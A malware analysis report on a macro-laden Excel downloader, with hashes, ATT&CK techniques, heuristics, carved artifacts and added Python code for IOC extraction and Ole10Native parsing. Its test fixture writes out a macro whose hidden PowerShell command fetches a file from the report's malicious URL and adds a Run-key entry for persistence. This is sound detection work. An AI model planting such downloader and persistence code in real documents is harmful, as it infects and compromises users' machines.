Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 19336c830f9d53df…

MALICIOUS

Office (OLE) / .XLS

Size: 124.0 KB
Created: 2015-06-05 18:17:20
Authoring application: Microsoft Excel
First seen: 2022-09-13

MD5: 8cf68abcb86481f0dec08fb6a982046c
SHA-1: 70e3554c03b309aa328d872c00e4a12f9008f7f9
SHA-256: 19336c830f9d53df82c43650dca69b1e6c8c51d69941baed232fef1928a927ae

Risk score: 100

Malware Insights

MITRE ATT&CK
  • T1059.001 PowerShell
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample contains VBA macros that call the ShellExecute API to run a PowerShell command. That command downloads a JavaScript file from 'http://ddapoknet.ug/ups/pu/yaw.sbv/yaw.sbv' and executes it. The macro also attempts persistence by writing to the Run key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy', so the payload is re-launched at each logon of the affected user. Together these behaviours are those of a downloader: an initial-access stage that fetches a second-stage payload rather than carrying it. The URL and the Run-key value name are the indicators to block and hunt for. Note that the 'Created' timestamp in the file metadata is taken from document properties the author controls, so the 2015 date should not be read as the campaign date; 'First seen' (2022-09-13) is the only observation-based date on this page.

Heuristics (3)

  • SC_STR_SHELLEXEC (high): Reference to ShellExecute API
  • OLE_VBA_CREATEOBJ (high): CreateObject call
  • OLE_VBA_MACROS (medium): VBA macros detected; document contains VBA macro code
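The summary and the three heuristic hits above can be reproduced on decoded macro source. The Python below is an added example, not part of this report and not oletools' own rule engine: it re-implements the three rule IDs from the Heuristics table as regexes of my own, pulls the URL and Run-key indicators out of the code, and maps the result to the ATT&CK IDs the report assigns. The VBA it runs on is a constructed fixture that carries the report's two IOCs; the real macros.bas is not reproduced on this page, and nothing in the fixture is executed or fetched.

```python
import re

# Constructed VBA fixture for this example only. It is NOT the decoded
# macros.bas carved from the sample (the report does not reproduce it); it
# exercises the three heuristics the report fired and carries the two IOCs
# named in the report's summary. The text is only pattern-matched.
SAMPLE_VBA = r'''
Attribute VB_Name = "ThisWorkbook"
Private Sub Workbook_Open()
    Dim sh As Object, ws As Object
    Dim url As String, js As String
    url = "http://ddapoknet.ug/ups/pu/yaw.sbv/yaw.sbv"
    js = Environ("TEMP") & "\yaw.js"
    Set sh = CreateObject("Shell.Application")
    sh.ShellExecute "powershell.exe", "-w hidden -c (New-Object Net.WebClient).DownloadFile('" & url & "','" & js & "')", "", "open", 0
    Set ws = CreateObject("WScript.Shell")
    ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy", "wscript.exe " & js, "REG_SZ"
End Sub
'''

# Rule IDs and severities are the ones in the report's Heuristics table;
# the regexes are my approximation of what each rule looks for.
HEURISTICS = [
    ("SC_STR_SHELLEXEC", "high", re.compile(r"\bShellExecute\b", re.I)),
    ("OLE_VBA_CREATEOBJ", "high", re.compile(r"\bCreateObject\s*\(", re.I)),
    ("OLE_VBA_MACROS", "medium",
     re.compile(r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+\w+", re.I | re.M)),
]

# Extra indicator patterns (my own, not part of the report's rule set).
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.I)
RUN_KEY_RE = re.compile(
    r"HK(?:CU|LM|EY_CURRENT_USER|EY_LOCAL_MACHINE)\\SOFTWARE\\Microsoft\\Windows"
    r"\\CurrentVersion\\Run(?:Once)?(?:\\[^\"'\s]+)?", re.I)
AUTOEXEC_RE = re.compile(r"\b(Workbook_Open|Auto_Open|AutoOpen|Document_Open|AutoExec)\b", re.I)
POWERSHELL_RE = re.compile(r"\bpowershell(?:\.exe)?\b", re.I)


def _dedupe(items):
    seen, out = set(), []
    for item in items:
        if item not in seen:
            seen.add(item)
            out.append(item)
    return out


def run_heuristics(vba):
    """Return [(rule_id, severity)] for every report heuristic that fires on the source."""
    return [(rid, sev) for rid, sev, rx in HEURISTICS if rx.search(vba)]


def extract_iocs(vba):
    """Pull network and persistence indicators plus auto-exec triggers out of VBA source."""
    return {
        "urls": _dedupe(URL_RE.findall(vba)),
        "run_keys": _dedupe(RUN_KEY_RE.findall(vba)),
        "autoexec": _dedupe(m.group(1) for m in AUTOEXEC_RE.finditer(vba)),
        "powershell": bool(POWERSHELL_RE.search(vba)),
    }


def attack_techniques(vba):
    """Map findings to the ATT&CK IDs the report assigns: T1059.005 (Visual Basic) and
    T1204.002 (Malicious File) follow from any macro document, T1059.001 from a PowerShell call."""
    techs = ["T1059.005", "T1204.002"]
    if POWERSHELL_RE.search(vba):
        techs.insert(0, "T1059.001")
    return techs


if __name__ == "__main__":
    for rid, sev in run_heuristics(SAMPLE_VBA):
        print(f"{sev:6} {rid}")
    print(extract_iocs(SAMPLE_VBA))
    print(attack_techniques(SAMPLE_VBA))
```

To get the real input, run `olevba -c` on the sample; the artifact table's source field names `oletools.olevba.extract_macros`, which is the function that tool wraps. The extracted Run-key path can then be checked on a suspect host with `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v IAccessible2Proxy`.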

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
  SHA-256: 756fbacdf78f2ce41f223e340dcae3250cc9a94275bffd341a5cda687967d0bd
  Kind:    vba-macro
  Source:  oletools.olevba.extract_macros (decoded VBA source)
  Size:    1424 bytes

Filename: ole10native_00.bin
  SHA-256: 74b3118d3e61f0e439d04780cac607d5f288e9b79dfd2f472e242994aa016a48
  Kind:    ole-package
  Source:  OLE Ole10Native stream: MBD03936731/Ole10Native
  Size:    1318 bytes
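The second artifact is a Packager (Ole10Native) object, the mechanism by which an arbitrary file is embedded in an Office document; the stream lives under the MBD… storage named in the table. Parsing it yourself shows what such a carved stream carries: the original filename, the source and temp paths from the machine where it was embedded, and the embedded file bytes. The Python below is an added example, not the report's extraction code: it follows the field layout oletools' oleobj uses for this stream (the two DWORDs after the paths are kept as the undocumented values oleobj also reports), builds a constructed fixture that is not the sample's object, and parses it without trusting the declared lengths, so a truncated or padded stream is flagged instead of silently yielding garbage.

```python
import hashlib
import struct


def _cstring(buf, off):
    """Read a NUL-terminated ANSI string at off; return (text, offset past the NUL)."""
    end = buf.find(b"\x00", off)
    if end < 0:
        raise ValueError("unterminated string at offset %d" % off)
    return buf[off:end].decode("cp1252", errors="replace"), end + 1


def _u32(buf, off):
    if off + 4 > len(buf):
        raise ValueError("truncated DWORD at offset %d" % off)
    return struct.unpack_from("<I", buf, off)[0], off + 4


def parse_ole10native(stream):
    """Parse the bytes of an Ole10Native stream (Packager format; the stream name in the
    OLE container starts with byte 0x01) and return the embedded file plus its metadata."""
    total, off = _u32(stream, 0)               # size of everything after this DWORD
    if off + 2 > len(stream):
        raise ValueError("truncated flags field")
    flags = struct.unpack_from("<H", stream, off)[0]   # normally 0x0002
    off += 2
    label, off = _cstring(stream, off)         # display name of the embedded file
    src_path, off = _cstring(stream, off)      # path on the machine that embedded it
    unknown, off = _u32(stream, off)           # usually 0x00030000; meaning undocumented
    temp_len, off = _u32(stream, off)          # length of the temp path incl. its NUL
    temp_path, off = _cstring(stream, off)
    size, off = _u32(stream, off)              # length of the embedded file bytes
    if off + size > len(stream):
        raise ValueError("declared payload size %d exceeds stream" % size)
    data = stream[off:off + size]
    return {
        "flags": flags,
        "label": label,
        "src_path": src_path,
        "temp_path": temp_path,
        "unknown": unknown,
        "size": size,
        "data": data,
        "sha256": hashlib.sha256(data).hexdigest(),
        # Consistency checks: a mismatch means the stream was truncated,
        # padded or tampered with, which is worth knowing before trusting it.
        "size_field_ok": total == len(stream) - 4,
        "temp_len_ok": temp_len == len(temp_path) + 1,
        "trailing_bytes": len(stream) - (off + size),
    }


def is_well_formed(stream):
    """True if the stream parses and its length fields agree with its actual length."""
    try:
        info = parse_ole10native(stream)
    except ValueError:
        return False
    return info["size_field_ok"] and info["trailing_bytes"] == 0


def build_ole10native(label, src_path, temp_path, payload, flags=2):
    """Serialise an Ole10Native stream; used here only to construct a test fixture."""
    tp = temp_path.encode("cp1252") + b"\x00"
    body = struct.pack("<H", flags)
    body += label.encode("cp1252") + b"\x00"
    body += src_path.encode("cp1252") + b"\x00"
    body += struct.pack("<I", 0x00030000)
    body += struct.pack("<I", len(tp)) + tp
    body += struct.pack("<I", len(payload)) + payload
    return struct.pack("<I", len(body)) + body


# Constructed fixture: not the ole10native_00.bin carved from the sample.
FIXTURE = build_ole10native(
    "note.txt",
    r"C:\Users\user\Desktop\note.txt",
    r"C:\Users\user\AppData\Local\Temp\note.txt",
    b"constructed payload, not the sample's embedded object",
)

if __name__ == "__main__":
    info = parse_ole10native(FIXTURE)
    for key in ("label", "src_path", "temp_path", "size", "sha256", "size_field_ok"):
        print(f"{key:14} {info[key]}")
```

On a real sample, `oleobj` from oletools performs the same extraction; the src_path and temp_path values it recovers often leak the username and directory layout of the machine the document was built on, which is useful attribution context alongside the payload hash.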